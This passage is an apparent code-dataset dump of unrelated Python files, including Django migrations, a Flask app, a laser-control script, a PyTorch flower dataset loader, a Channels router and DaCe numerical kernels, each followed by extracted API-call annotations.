identifier\n'), ((1409, 1462), 't_system.identifier.change_keys', 'identifier.change_keys', ([], {'private_id': "data['private_id']"}), "(private_id=data['private_id'])\n", (1431, 1462), False, 'from t_system import identifier\n')] |
# Generated by Django 3.2.12 on 2022-04-12 14:00
from django.db import migrations
class Migration(migrations.Migration):
    # Data migration: back-fills product_digitalcontenturl.order_line_token
    # from the related order_orderline row's token for pre-existing URLs.
    dependencies = [
        ("product", "0167_digitalcontenturl_order_line_token"),
        ("order", "0140_alter_orderline_old_id_and_created_at"),
    ]
    operations = [
        migrations.RunSQL(
            """
            UPDATE product_digitalcontenturl
            SET order_line_token = (
                SELECT token
                FROM order_orderline
                WHERE product_digitalcontenturl.line_id = order_orderline.id
            )
            WHERE line_id IS NOT NULL;
            """,
            # One-way data fix: reversing the migration leaves the data as-is.
            reverse_sql=migrations.RunSQL.noop,
        ),
    ]
| [
"django.db.migrations.RunSQL"
] | [((309, 671), 'django.db.migrations.RunSQL', 'migrations.RunSQL', (['"""\n UPDATE product_digitalcontenturl\n SET order_line_token = (\n SELECT token\n FROM order_orderline\n WHERE product_digitalcontenturl.line_id = order_orderline.id\n )\n WHERE line_id IS NOT NULL;\n """'], {'reverse_sql': 'migrations.RunSQL.noop'}), '(\n """\n UPDATE product_digitalcontenturl\n SET order_line_token = (\n SELECT token\n FROM order_orderline\n WHERE product_digitalcontenturl.line_id = order_orderline.id\n )\n WHERE line_id IS NOT NULL;\n """\n , reverse_sql=migrations.RunSQL.noop)\n', (326, 671), False, 'from django.db import migrations\n')] |
from argparse import ArgumentParser
from sys import stdin, stdout
from tempfile import NamedTemporaryFile
from time import sleep
from webbrowser import open as open_web
from naughtty import NaughTTY
from thtml import get_version
from thtml.cli import write_html
from thtml.options import Scope
def cli_entry() -> None:
    """CLI entry point: convert text to HTML.

    The text comes either from running a wrapped command (any unrecognised
    arguments) or from stdin; output goes to stdout, or to a temporary file
    opened in the default browser when --open is given.
    """
    parser = ArgumentParser(
        add_help=False,
        description="Converts text to HTML.",
        epilog="Made with love by <NAME>: https://github.com/cariad/thtml",
    )
    parser.add_argument(
        "-o",
        "--open",
        action="store_true",
        help="opens the output in the default browser",
    )
    parser.add_argument(
        "-s",
        "--scope",
        choices=[Scope.DOCUMENT.value, Scope.FRAGMENT.value],
        default=Scope.DOCUMENT.value,
        help="output an entire HTML document (default) or fragment",
    )
    parser.add_argument(
        "-t",
        "--theme",
        help="name (default, google-fonts, plain) or path to custom theme YAML file",
    )
    parser.add_argument(
        "--version",
        action="store_true",
        help="shows the version",
    )
    # Unrecognised arguments are collected as the command to execute.
    args, command = parser.parse_known_args()
    if args.version:
        print(get_version())
        return
    # add_help=False above, so --help is handled manually here.
    if command and command[0] == "--help":
        parser.print_help()
        exit(0)
    if command:
        # Run the command via NaughTTY and capture its output
        # (presumably under a pseudo-terminal — confirm in naughtty docs).
        ntty = NaughTTY(command)
        ntty.execute()
        body = ntty.output
    else:
        # No command given: read the text to convert from stdin.
        body = stdin.read()
    if args.open:
        with NamedTemporaryFile("a+", suffix=".html") as temp:
            write_html(
                text=body,
                scope=Scope(args.scope),
                writer=temp,
                theme=args.theme,
            )
            open_web(f"file://{temp.name}")
            # Give the browser a chance to open the file before we delete it:
            sleep(1)
        return
    write_html(
        text=body,
        scope=Scope(args.scope),
        writer=stdout,
        theme=args.theme,
    )
if __name__ == "__main__":
    # Allow running this module directly as a script.
    cli_entry()
| [
"thtml.options.Scope",
"argparse.ArgumentParser",
"webbrowser.open",
"time.sleep",
"naughtty.NaughTTY",
"thtml.get_version",
"tempfile.NamedTemporaryFile",
"sys.stdin.read"
] | [((336, 477), 'argparse.ArgumentParser', 'ArgumentParser', ([], {'add_help': '(False)', 'description': '"""Converts text to HTML."""', 'epilog': '"""Made with love by <NAME>: https://github.com/cariad/thtml"""'}), "(add_help=False, description='Converts text to HTML.', epilog\n ='Made with love by <NAME>: https://github.com/cariad/thtml')\n", (350, 477), False, 'from argparse import ArgumentParser\n'), ((1387, 1404), 'naughtty.NaughTTY', 'NaughTTY', (['command'], {}), '(command)\n', (1395, 1404), False, 'from naughtty import NaughTTY\n'), ((1481, 1493), 'sys.stdin.read', 'stdin.read', ([], {}), '()\n', (1491, 1493), False, 'from sys import stdin, stdout\n'), ((1237, 1250), 'thtml.get_version', 'get_version', ([], {}), '()\n', (1248, 1250), False, 'from thtml import get_version\n'), ((1526, 1566), 'tempfile.NamedTemporaryFile', 'NamedTemporaryFile', (['"""a+"""'], {'suffix': '""".html"""'}), "('a+', suffix='.html')\n", (1544, 1566), False, 'from tempfile import NamedTemporaryFile\n'), ((1757, 1788), 'webbrowser.open', 'open_web', (['f"""file://{temp.name}"""'], {}), "(f'file://{temp.name}')\n", (1765, 1788), True, 'from webbrowser import open as open_web\n'), ((1879, 1887), 'time.sleep', 'sleep', (['(1)'], {}), '(1)\n', (1884, 1887), False, 'from time import sleep\n'), ((1957, 1974), 'thtml.options.Scope', 'Scope', (['args.scope'], {}), '(args.scope)\n', (1962, 1974), False, 'from thtml.options import Scope\n'), ((1649, 1666), 'thtml.options.Scope', 'Scope', (['args.scope'], {}), '(args.scope)\n', (1654, 1666), False, 'from thtml.options import Scope\n')] |
from flask import Flask, render_template, url_for
import os
app = Flask(__name__)  # WSGI application instance shared by the route decorators below
# Homepage
@app.route('/')
def index():
    """Render the site homepage template."""
    return render_template('index.html')
# Domestic Dashboards
@app.route('/domestic/')
@app.route('/domestic/<model>')
def domestic(model=None):
    """Render the domestic dashboard, optionally scoped to one model name from the URL."""
    return render_template('domestic.html', model=model)
# JSON API (allows users to "download" JSON files)
@app.route('/json/')
def json():
    """List the files available under static/json/.

    NOTE(review): this name shadows the stdlib ``json`` module within this
    file, and the response is Python's ``str()`` of a list rather than a
    JSON document — confirm clients expect that format before changing it.
    """
    return str(os.listdir('static/json/'))
@app.route('/json/meta/')
@app.route('/json/meta/<file>')
def json_meta(file=None):
    """Serve one metadata file, or list the metadata directory when no file is named."""
    if file is None:
        return str(os.listdir('static/json/meta/'))
    resource_path = 'static/json/meta/{}'.format(file)
    with app.open_resource(resource_path) as handle:
        return handle.read()
@app.route('/json/models/')
@app.route('/json/models/<file>')
def json_models(file=None):
    """Serve one model file, or list the models directory when no file is named."""
    if file is None:
        return str(os.listdir('static/json/models/'))
    resource_path = 'static/json/models/{}'.format(file)
    with app.open_resource(resource_path) as handle:
        return handle.read()
# Trick (converting Python variable to Javascript variable)
# @app.route('/some/route/<url>')
# def convert_variable(url=None):
# x = some data pull (e.g. SQL query), dict or list
# if x is not None:
# return render_template('page.html', jsonify(x))
# return render_template('page.html', x) # then {{ x | tojson }} in page.html...
# else:
# return render_template('page.html')
| [
"flask.render_template",
"os.listdir",
"flask.Flask"
] | [((67, 82), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (72, 82), False, 'from flask import Flask, render_template, url_for\n'), ((136, 165), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (151, 165), False, 'from flask import Flask, render_template, url_for\n'), ((284, 329), 'flask.render_template', 'render_template', (['"""domestic.html"""'], {'model': 'model'}), "('domestic.html', model=model)\n", (299, 329), False, 'from flask import Flask, render_template, url_for\n'), ((431, 457), 'os.listdir', 'os.listdir', (['"""static/json/"""'], {}), "('static/json/')\n", (441, 457), False, 'import os\n'), ((699, 730), 'os.listdir', 'os.listdir', (['"""static/json/meta/"""'], {}), "('static/json/meta/')\n", (709, 730), False, 'import os\n'), ((980, 1013), 'os.listdir', 'os.listdir', (['"""static/json/models/"""'], {}), "('static/json/models/')\n", (990, 1013), False, 'import os\n')] |
import pyvisa
import time
import numpy as np
from struct import unpack
import matplotlib.pyplot as plt
# Open the laser controller over VISA on serial resource ASRL3.
rm = pyvisa.ResourceManager()
rm.list_resources()  # NOTE(review): result is discarded — likely a leftover discovery probe; confirm
GEM = rm.open_resource('ASRL3::INSTR')
def Turn_on():
    """Enable the laser and reset its power to the minimum setting."""
    GEM.write('ON')
    # Start at the lowest setting (presumably 1 mW, zero-padded to 3 digits — confirm against the controller manual).
    GEM.write('POWER=001')
    print('Laser has initialized!!!')
def SetPower(pw_mw):
    """Set the laser output power and wait for it to settle.

    Args:
        pw_mw: Target power in mW.
    """
    # NOTE(review): unlike Turn_on's 'POWER=001' this value is not
    # zero-padded to three digits — confirm the controller accepts both forms.
    GEM.write('POWER='+str(pw_mw))
    print('Power has changed to '+str(pw_mw)+' mW!!!Please wait...')
    # Allow the output to stabilise before the caller continues.
    time.sleep(10)
def Turn_off():
    """Ramp power down to the minimum, wait, then disable the laser."""
    GEM.write('POWER=001')
    print('Reset power!!!Please wait...')
    # Let the power drop settle before switching the emission off.
    time.sleep(10)
    GEM.write('OFF')
    print('Laser has been disabled!!!')
def PowerQ():
    """Query the current power setting; returns the first whitespace-separated token of the 'POWER?' reply."""
    return GEM.query('POWER?').split()[0]
def tempQ():
    """Collect five laser temperature readings and print them.

    Empty replies from the controller are skipped; polling continues
    until five valid readings have been gathered.
    """
    readings = []
    while len(readings) < 5:
        reply = GEM.query('LASTEMP?').split()
        if reply:
            # Drop the trailing unit character before converting to float.
            readings.append(float(reply[0][:-1]))
    print(readings)
| [
"time.sleep",
"pyvisa.ResourceManager"
] | [((109, 133), 'pyvisa.ResourceManager', 'pyvisa.ResourceManager', ([], {}), '()\n', (131, 133), False, 'import pyvisa\n'), ((424, 438), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (434, 438), False, 'import time\n'), ((529, 543), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (539, 543), False, 'import time\n')] |
"""
Oxford Flowers dataset loader
1020 samples spanning 102 classes (avg 10 per class)
http://www.robots.ox.ac.uk/~vgg/data/flowers
"""
from __future__ import print_function
import numpy as np
from PIL import Image, ImageFile
from os.path import join
import os
import scipy.io
import tarfile
import shutil
from torch.utils.data.dataset import Dataset
from torchvision.datasets.utils import download_url
class OxfordFlowersDataset(Dataset):
    # setup some class paths
    sub_root_dir = 'OxfordFlowers'  # subdirectory of root_dir holding this dataset
    download_url_prefix = 'http://www.robots.ox.ac.uk/~vgg/data/flowers/102'  # base URL for all dataset files
    images_dir = 'jpg'  # folder (inside sub_root_dir) with the extracted images
    def __init__(self,
                 root_dir,
                 split='train',
                 transform=None,
                 target_transform=None,
                 force_download=False,
                 categories_subset=None):
        """
        :param root_dir: (string) the directory where the dataset will be stored
        :param split: (string) 'train', 'trainval', 'val' or 'test'
        :param transform: how to transform the input
        :param target_transform: how to transform the target
        :param force_download: (boolean) force a new download of the dataset
        :param categories_subset: (iterable) specify a subset of categories to build this set from
        """
        super(OxfordFlowersDataset, self).__init__()
        # set instance variables
        self.root_dir = join(os.path.expanduser(root_dir), self.sub_root_dir)
        self.split = split
        self.transform = transform
        self.target_transform = target_transform
        self.labels = []
        # check if data exists, if not download
        self.download(force=force_download)
        # load the data samples for this split
        # NOTE(review): the docstring above mentions 'trainval', but
        # load_data_split asserts split in ['train', 'val', 'test'] — confirm.
        self.data, self.labels, self.categories = self.load_data_split(categories_subset=categories_subset)
        self.samples = list(zip(self.data, self.labels))
        self.n_categories = len(np.unique(self.labels))
def __len__(self):
return len(self.samples)
def __getitem__(self, index):
# get the data sample
sample_data, sample_target = self.samples[index]
# load the image
x = self.load_img(join(join(self.root_dir, self.images_dir), "image_%05d.jpg" % (sample_data+1)))
y = sample_target
# perform the transforms
if self.transform:
x = self.transform(x)
if self.target_transform:
y = self.target_transform(y)
return x, y
def download(self, force=False):
# check for existence, if so return
if os.path.exists(join(self.root_dir, 'jpg')) and os.path.exists(join(self.root_dir, 'imagelabels.mat'))\
and os.path.exists(join(self.root_dir, 'setid.mat')):
if not force and len(os.listdir(join(self.root_dir, 'jpg'))) == 8189:
print('Files already downloaded and verified')
return
else:
shutil.rmtree(self.root_dir)
# make the dirs and start the downloads
os.makedirs(self.root_dir, exist_ok=True)
filename = '102flowers'
tar_filename = filename + '.tgz'
url = join(self.download_url_prefix, tar_filename)
download_url(url, self.root_dir, tar_filename, None)
with tarfile.open(join(self.root_dir, tar_filename), 'r') as tar_file:
tar_file.extractall(self.root_dir)
os.remove(join(self.root_dir, tar_filename))
filename = 'imagelabels.mat'
url = join(self.download_url_prefix, filename)
download_url(url, self.root_dir, filename, None)
filename = 'setid.mat'
url = join(self.download_url_prefix, filename)
download_url(url, self.root_dir, filename, None)
def load_data_split(self, categories_subset=None):
# assert we can do this split
assert self.split in ['train', 'val', 'test']
# load all the samples and their labels
all_samples = scipy.io.loadmat(join(self.root_dir, 'setid.mat'))
all_categories = scipy.io.loadmat(join(self.root_dir, 'imagelabels.mat'))['labels']
# keep only the split samples and categories
if self.split == 'train':
split_samples = all_samples['trnid']
elif self.split == 'val':
split_samples = all_samples['valid']
elif self.split == 'test':
split_samples = all_samples['tstid']
split_samples = list(split_samples[0]-1) # index at 0 not 1
split_categories = list(all_categories[0][split_samples])
# lets now add if they are in the category_subset iterable
data = []
categories = []
for index in range(len(split_samples)):
category = split_categories[index]
if categories_subset:
if category in categories_subset:
data.append(split_samples[index])
categories.append(split_categories[index])
else: # categories_subset is None so add all
data.append(split_samples[index])
categories.append(split_categories[index])
# Build categories to labels (cats can be names, labels are ints starting from 0)
self.categories_to_labels = {}
self.labels_to_categories = {}
for c in categories:
if c not in self.categories_to_labels:
self.categories_to_labels[c] = len(self.categories_to_labels)
self.labels_to_categories[self.categories_to_labels[c]] = c
# Build labels list corresponding to each sample
labels = []
for c in categories:
labels.append(self.categories_to_labels[c])
# set the data, categories and labels used in this dataset
# (initially ordered with self.samples and not unique, careful with access post shuffling)
self.categories = categories
self.labels = labels
self.data = data
return data, labels, categories
@staticmethod
def load_img(path):
# todo either turn image to tensor in transform or do here
# Load the image
ImageFile.LOAD_TRUNCATED_IMAGES = True
image = Image.open(path)#.convert('RGB')
return image
def stats(self):
# get the stats to print
counts = self.class_counts()
return "%d samples spanning %d classes (avg %d per class)" % \
(len(self.samples), len(counts), int(float(len(self.samples))/float(len(counts))))
def class_counts(self):
# calculate the number of samples per category
counts = {}
for index in range(len(self.samples)):
sample_data, sample_target = self.samples[index]
if sample_target not in counts:
counts[sample_target] = 1
else:
counts[sample_target] += 1
return counts
if __name__ == "__main__":
    # use this for debugging and checks
    from utils.debug import set_working_dir
    from config.config import config
    import matplotlib.pyplot as plt
    # set the working directory as appropriate
    set_working_dir()
    # load the dataset
    dataset = OxfordFlowersDataset(root_dir=config.dataset.root_dir)
    # print the stats
    print(dataset.stats())
    # lets plot some samples -- only the first four fit the 1x4 grid below
    fig = plt.figure()
    for i in range(len(dataset)):
        sample = dataset[i]
        ax = plt.subplot(1, 4, i + 1)
        plt.tight_layout()
        ax.set_title('Sample %d - Class %d' % (i, dataset.labels_to_categories[sample[1]]))  # convert label to category
        ax.axis('off')
        plt.imshow(sample[0])  # todo when tensor will need to convert tensor to img
        if i == 3:
            # show the figure after the fourth sample and stop
            plt.show()
            break
| [
"matplotlib.pyplot.imshow",
"PIL.Image.open",
"numpy.unique",
"os.makedirs",
"os.path.join",
"torchvision.datasets.utils.download_url",
"utils.debug.set_working_dir",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.tight_layout",
"shutil.rmtree",
"matplotlib.pyplot.subplot",
"os.path.expanduser... | [((7147, 7164), 'utils.debug.set_working_dir', 'set_working_dir', ([], {}), '()\n', (7162, 7164), False, 'from utils.debug import set_working_dir\n'), ((7348, 7360), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (7358, 7360), True, 'import matplotlib.pyplot as plt\n'), ((3059, 3100), 'os.makedirs', 'os.makedirs', (['self.root_dir'], {'exist_ok': '(True)'}), '(self.root_dir, exist_ok=True)\n', (3070, 3100), False, 'import os\n'), ((3188, 3232), 'os.path.join', 'join', (['self.download_url_prefix', 'tar_filename'], {}), '(self.download_url_prefix, tar_filename)\n', (3192, 3232), False, 'from os.path import join\n'), ((3241, 3293), 'torchvision.datasets.utils.download_url', 'download_url', (['url', 'self.root_dir', 'tar_filename', 'None'], {}), '(url, self.root_dir, tar_filename, None)\n', (3253, 3293), False, 'from torchvision.datasets.utils import download_url\n'), ((3525, 3565), 'os.path.join', 'join', (['self.download_url_prefix', 'filename'], {}), '(self.download_url_prefix, filename)\n', (3529, 3565), False, 'from os.path import join\n'), ((3574, 3622), 'torchvision.datasets.utils.download_url', 'download_url', (['url', 'self.root_dir', 'filename', 'None'], {}), '(url, self.root_dir, filename, None)\n', (3586, 3622), False, 'from torchvision.datasets.utils import download_url\n'), ((3669, 3709), 'os.path.join', 'join', (['self.download_url_prefix', 'filename'], {}), '(self.download_url_prefix, filename)\n', (3673, 3709), False, 'from os.path import join\n'), ((3718, 3766), 'torchvision.datasets.utils.download_url', 'download_url', (['url', 'self.root_dir', 'filename', 'None'], {}), '(url, self.root_dir, filename, None)\n', (3730, 3766), False, 'from torchvision.datasets.utils import download_url\n'), ((6208, 6224), 'PIL.Image.open', 'Image.open', (['path'], {}), '(path)\n', (6218, 6224), False, 'from PIL import Image, ImageFile\n'), ((7438, 7462), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(1)', '(4)', '(i + 1)'], {}), 
'(1, 4, i + 1)\n', (7449, 7462), True, 'import matplotlib.pyplot as plt\n'), ((7471, 7489), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (7487, 7489), True, 'import matplotlib.pyplot as plt\n'), ((7640, 7661), 'matplotlib.pyplot.imshow', 'plt.imshow', (['sample[0]'], {}), '(sample[0])\n', (7650, 7661), True, 'import matplotlib.pyplot as plt\n'), ((1428, 1456), 'os.path.expanduser', 'os.path.expanduser', (['root_dir'], {}), '(root_dir)\n', (1446, 1456), False, 'import os\n'), ((1952, 1974), 'numpy.unique', 'np.unique', (['self.labels'], {}), '(self.labels)\n', (1961, 1974), True, 'import numpy as np\n'), ((3438, 3471), 'os.path.join', 'join', (['self.root_dir', 'tar_filename'], {}), '(self.root_dir, tar_filename)\n', (3442, 3471), False, 'from os.path import join\n'), ((4005, 4037), 'os.path.join', 'join', (['self.root_dir', '"""setid.mat"""'], {}), "(self.root_dir, 'setid.mat')\n", (4009, 4037), False, 'from os.path import join\n'), ((7749, 7759), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7757, 7759), True, 'import matplotlib.pyplot as plt\n'), ((2212, 2248), 'os.path.join', 'join', (['self.root_dir', 'self.images_dir'], {}), '(self.root_dir, self.images_dir)\n', (2216, 2248), False, 'from os.path import join\n'), ((2613, 2639), 'os.path.join', 'join', (['self.root_dir', '"""jpg"""'], {}), "(self.root_dir, 'jpg')\n", (2617, 2639), False, 'from os.path import join\n'), ((2660, 2698), 'os.path.join', 'join', (['self.root_dir', '"""imagelabels.mat"""'], {}), "(self.root_dir, 'imagelabels.mat')\n", (2664, 2698), False, 'from os.path import join\n'), ((2736, 2768), 'os.path.join', 'join', (['self.root_dir', '"""setid.mat"""'], {}), "(self.root_dir, 'setid.mat')\n", (2740, 2768), False, 'from os.path import join\n'), ((2973, 3001), 'shutil.rmtree', 'shutil.rmtree', (['self.root_dir'], {}), '(self.root_dir)\n', (2986, 3001), False, 'import shutil\n'), ((3320, 3353), 'os.path.join', 'join', (['self.root_dir', 'tar_filename'], {}), 
'(self.root_dir, tar_filename)\n', (3324, 3353), False, 'from os.path import join\n'), ((4081, 4119), 'os.path.join', 'join', (['self.root_dir', '"""imagelabels.mat"""'], {}), "(self.root_dir, 'imagelabels.mat')\n", (4085, 4119), False, 'from os.path import join\n'), ((2815, 2841), 'os.path.join', 'join', (['self.root_dir', '"""jpg"""'], {}), "(self.root_dir, 'jpg')\n", (2819, 2841), False, 'from os.path import join\n')] |
#!/usr/bin/python3
import re
from custom_vims import VIMS
import json
"""
commands:
$ create_vims id port
$ create_vertiport ENAC
$ create_vertiport LFBO
$ get_vertiport vertiport_name
$ delete_vertiport vertiport_name
"""
def is_uuid(uuid):
    """Return True if *uuid* is a canonical 8-4-4-4-12 hex UUID string.

    Bug fix: the original used ``re.match``, which only anchors at the
    start of the string, so any valid UUID followed by trailing junk was
    accepted. ``re.fullmatch`` requires the whole string to match.

    :param uuid: (string) candidate UUID
    :return: (bool) True for a well-formed UUID, False otherwise
    """
    return re.fullmatch(
        '[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}'
        '-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}',
        uuid) is not None
def main():
    """
    Main program: a tiny REPL driving a single VIMS instance.

    First loops until a valid ``create_vims id port`` command is entered,
    then serves vertiport commands until Ctrl-C triggers cleanup and exit.
    """
    loop_vims_init = True
    while loop_vims_init:
        cmd_create_vims = input()
        cmd_create_vims_args = re.split(r'\s', cmd_create_vims)
        # NOTE(review): only ports 1000..9998 are accepted; a short or
        # non-numeric command raises IndexError/ValueError instead of
        # re-prompting -- confirm whether that is intended.
        if cmd_create_vims_args[0] == "create_vims" \
            and isinstance(cmd_create_vims_args[1], str) \
            and int(cmd_create_vims_args[2]) < 9999 \
            and int(cmd_create_vims_args[2]) >= 1000:
            vims = VIMS(cmd_create_vims_args[1], cmd_create_vims_args[2])
            loop_vims_init = False
        else:
            print('bad cmd, use $ create_vims id port')
    while True:
        try:
            cmd = input('\n')
            cmd_args = re.split(r'\s', cmd)
            if cmd_args[0] == "get_vertiport":
                vims.get_vertiport(cmd_args[1])
            elif cmd_args[0] == "create_vertiport":
                # both sample vertiports are created regardless of arguments
                vims.create_vertiport_test("ENAC_Vertiport.json")
                vims.create_vertiport_test("LFBO_Vertiport.json")
            elif cmd_args[0] == "delete_vertiport":
                vims.delete_vertiport()
        except KeyboardInterrupt:
            # delete all ISAs created
            print("Deleting Vertiports before killing VIMS")
            for vertiport in vims.vertiports:
                vims.delete_vertiport(_vertiport_name=vertiport.name)
            print("Done")
            return
if __name__ == "__main__":
main() | [
"re.split",
"custom_vims.VIMS",
"re.match"
] | [((283, 386), 're.match', 're.match', (['"""[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}"""', 'uuid'], {}), "(\n '[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}'\n , uuid)\n", (291, 386), False, 'import re\n'), ((571, 603), 're.split', 're.split', (['"""\\\\s"""', 'cmd_create_vims'], {}), "('\\\\s', cmd_create_vims)\n", (579, 603), False, 'import re\n'), ((799, 853), 'custom_vims.VIMS', 'VIMS', (['cmd_create_vims_args[1]', 'cmd_create_vims_args[2]'], {}), '(cmd_create_vims_args[1], cmd_create_vims_args[2])\n', (803, 853), False, 'from custom_vims import VIMS\n'), ((991, 1011), 're.split', 're.split', (['"""\\\\s"""', 'cmd'], {}), "('\\\\s', cmd)\n", (999, 1011), False, 'import re\n')] |
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
from django.urls import re_path
from chat.consumers import ChatConsumer
from teams.consumers import InvitationConsumer
# ASGI protocol routing: websocket connections pass through Django's
# session/auth middleware before reaching the chat or invitation consumer.
application = ProtocolTypeRouter({
    'websocket': AuthMiddlewareStack(
        URLRouter([
            # ws/chat/<room_name>/ -> per-room chat consumer
            re_path(r'^ws/chat/(?P<room_name>[^/]+)/$', ChatConsumer),
            # ws/invitation/<id>/ -> team invitation consumer
            re_path(r'^ws/invitation/(?P<id>[^/]+)/$', InvitationConsumer)
        ])
    ),
})
"django.urls.re_path"
] | [((332, 388), 'django.urls.re_path', 're_path', (['"""^ws/chat/(?P<room_name>[^/]+)/$"""', 'ChatConsumer'], {}), "('^ws/chat/(?P<room_name>[^/]+)/$', ChatConsumer)\n", (339, 388), False, 'from django.urls import re_path\n'), ((403, 464), 'django.urls.re_path', 're_path', (['"""^ws/invitation/(?P<id>[^/]+)/$"""', 'InvitationConsumer'], {}), "('^ws/invitation/(?P<id>[^/]+)/$', InvitationConsumer)\n", (410, 464), False, 'from django.urls import re_path\n')] |
import json
from spaceone.inventory.libs.manager import AWSManager
from spaceone.inventory.connector.pricing import PricingConnector
from spaceone.inventory.model.pricing.cloud_service_type import CLOUD_SERVICE_TYPES
class PricingManager(AWSManager):
    """Thin manager around the AWS Pricing API connector."""
    conn = None

    def __init__(self, transaction=None, **kwargs):
        """Create the manager and open a ready-to-use Pricing connector."""
        super().__init__(transaction=transaction)
        self.conn: PricingConnector = self.locator.get_connector('PricingConnector', **kwargs)
        self.conn.set_client()

    def list_service_codes(self):
        """Return the ServiceCode of every service the Pricing API reports."""
        codes = []
        for service in self.conn.describe_services():
            code = service.get('ServiceCode')
            if code:
                codes.append(code)
        return codes

    def list_products(self, service_code):
        """Yield each product of ``service_code`` parsed from its JSON string."""
        for raw_product in self.conn.get_products(service_code):
            yield json.loads(raw_product)

    @staticmethod
    def collect_cloud_service_types():
        """Yield the statically declared cloud service type resources."""
        yield from CLOUD_SERVICE_TYPES
| [
"json.loads"
] | [((803, 822), 'json.loads', 'json.loads', (['product'], {}), '(product)\n', (813, 822), False, 'import json\n')] |
# Generated by Django 2.1.3 on 2019-02-13 13:00
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
    """Create the ``StoredUpload`` model (django-drf-filepond).

    NOTE: migration files are historical records; do not edit the
    operations of a migration that has already been applied.
    """

    dependencies = [
        ('django_drf_filepond', '0002_add_upload_dir'),
    ]
    operations = [
        migrations.CreateModel(
            name='StoredUpload',
            fields=[
                # 22-char unique id; MinLengthValidator forces exactly 22
                ('upload_id',
                    models.CharField(
                        max_length=22, primary_key=True, serialize=False,
                        validators=[
                            django.core.validators.MinLengthValidator(22)])),
                ('file_path', models.CharField(max_length=2048)),
                ('uploaded', models.DateTimeField()),
                # set once automatically when the row is created
                ('stored', models.DateTimeField(auto_now_add=True)),
            ],
        ),
    ]
| [
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((625, 658), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(2048)'}), '(max_length=2048)\n', (641, 658), False, 'from django.db import migrations, models\n'), ((690, 712), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (710, 712), False, 'from django.db import migrations, models\n'), ((742, 781), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (762, 781), False, 'from django.db import migrations, models\n')] |
from java.lang import String
from org.myrobotlab.service import Speech
from org.myrobotlab.service import Sphinx
from org.myrobotlab.service import Runtime
# create mouth arduino and servo
# NOTE(review): this is a MyRobotLab (Jython) script; `python` below is
# presumably the MRL Python service injected into the interpreter -- confirm.
ear = Runtime.createAndStart("ear","Sphinx")
arduino = Runtime.createAndStart("arduino","Arduino")
arduino.connect("COM4")  # serial port is hard-coded -- adjust for your board
servo = Runtime.createAndStart("servo","Servo")
servo.attach(arduino, 10)  # servo signal wire attached on pin 10
# start listening for the words we are interested in
ear.startListening("go forward|go backwards|stop")
# set up a message route from the ear --to--> python method "heard"
ear.addListener("recognized", python.name, "heard", String().getClass());
# this method is invoked when something is
# recognized by the ear - in this case we
# have the mouth "talk back" the word it recognized
def heard(phrase):
    """Speech-recognition callback: move the servo for the known phrases."""
    print("I heard ", phrase)
    # dispatch table instead of the if/elif chain; unknown phrases are ignored
    positions = {"go forward": 170, "go backwards": 10, "stop": 90}
    if phrase in positions:
        servo.moveTo(positions[phrase])
| [
"java.lang.String",
"org.myrobotlab.service.Runtime.createAndStart"
] | [((198, 237), 'org.myrobotlab.service.Runtime.createAndStart', 'Runtime.createAndStart', (['"""ear"""', '"""Sphinx"""'], {}), "('ear', 'Sphinx')\n", (220, 237), False, 'from org.myrobotlab.service import Runtime\n'), ((247, 291), 'org.myrobotlab.service.Runtime.createAndStart', 'Runtime.createAndStart', (['"""arduino"""', '"""Arduino"""'], {}), "('arduino', 'Arduino')\n", (269, 291), False, 'from org.myrobotlab.service import Runtime\n'), ((323, 363), 'org.myrobotlab.service.Runtime.createAndStart', 'Runtime.createAndStart', (['"""servo"""', '"""Servo"""'], {}), "('servo', 'Servo')\n", (345, 363), False, 'from org.myrobotlab.service import Runtime\n'), ((619, 627), 'java.lang.String', 'String', ([], {}), '()\n', (625, 627), False, 'from java.lang import String\n')] |
import numpy as np
import dace as dc
# Symbolic array sizes, bound when the DaCe programs below are invoked.
M, N = (dc.symbol(s, dtype=dc.int64) for s in ('M', 'N'))
# Return a reversed copy of A: B[i] = A[M - 1 - i].
# (Comments only: the DaCe frontend parses a restricted Python subset.)
@dc.program
def flip(A: dc.float64[M]):
    B = np.ndarray((M, ), dtype=np.float64)
    # dc.map parallelizes the element-wise reversal
    for i in dc.map[0:M]:
        B[i] = A[M - 1 - i]
    return B
# Levinson-Durbin style recursion (cf. Polybench 'durbin'): solves the
# Toeplitz system defined by autocorrelation vector r, producing y.
@dc.program
def kernel(r: dc.float64[N]):
    y = np.empty_like(r)
    alpha = -r[0]
    beta = 1.0
    y[0] = -r[0]
    for k in range(1, N):
        beta *= 1.0 - alpha * alpha
        # reflection coefficient for step k
        alpha = -(r[k] + np.dot(flip(r[:k]), y[:k])) / beta
        # update the first k entries, then append the new coefficient
        y[:k] += alpha * flip(y[:k])
        y[k] = alpha
    return y
| [
"numpy.empty_like",
"numpy.ndarray",
"dace.symbol"
